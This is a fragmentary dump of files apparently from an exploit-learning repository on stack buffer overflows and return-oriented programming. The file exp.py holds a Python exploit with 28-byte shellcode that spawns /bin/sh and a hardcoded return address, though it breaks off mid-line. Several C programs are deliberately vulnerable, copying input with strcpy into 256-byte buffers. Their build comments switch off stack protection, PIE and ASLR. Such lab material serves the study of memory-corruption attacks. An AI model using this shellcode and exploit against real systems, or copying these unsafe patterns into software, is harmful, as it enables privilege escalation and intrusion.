fflush(stdout); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /new/obo/stack/exp.py: -------------------------------------------------------------------------------- 1 | #exp.py 2 | #!/usr/bin/env python 3 | import struct 4 | from subprocess import call 5 | 6 | #Spawn a shell. Size- 28 bytes. 7 | scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90" 8 | 9 | ret_addr = 0xbffff218 10 | 11 | #endianess conversion 12 | def conv(num): 13 | return struct.pack(" /proc/sys/kernel/randomize_va_space 2 | //$gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -o vuln vuln.c 3 | #include 4 | #include 5 | 6 | void foo(char* arg); 7 | void bar(char* arg); 8 | 9 | void foo(char* arg) { 10 | bar(arg); 11 | } 12 | 13 | void bar(char* arg) { 14 | char buf[256]; 15 | strcpy(buf, arg); 16 | } 17 | 18 | int main(int argc, char *argv[]) { 19 | if(strlen(argv[1])>256) { 20 | printf("Buffer Overflow Attempt!!!\r\n"); 21 | fflush(stdout); 22 | return 1; 23 | } 24 | foo(argv[1]); 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /rop/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/rop/vuln -------------------------------------------------------------------------------- /rop/vuln.c: -------------------------------------------------------------------------------- 1 | // vuln.c 2 | // gcc -o vuln vuln.c -fno-stack-protector -fno-pie -mpreferred-stack-boundary=2 3 | #include 4 | #include 5 | 6 | int main (int argc, char **argv) 7 | { 8 | char buf[256]; 9 | int i; 10 | seteuid (getuid()); 11 | if (argc < 2) 12 | { 13 | puts ("Need an argument\n"); 14 | exit (1); 15 | } 16 | // vulnerable code 17 | strcpy (buf, argv[1]); 18 | printf ("%s\nLen:%d\n", buf, (int)strlen(buf)); 19 | return (0); 20 | } 21 | --------------------------------------------------------------------------------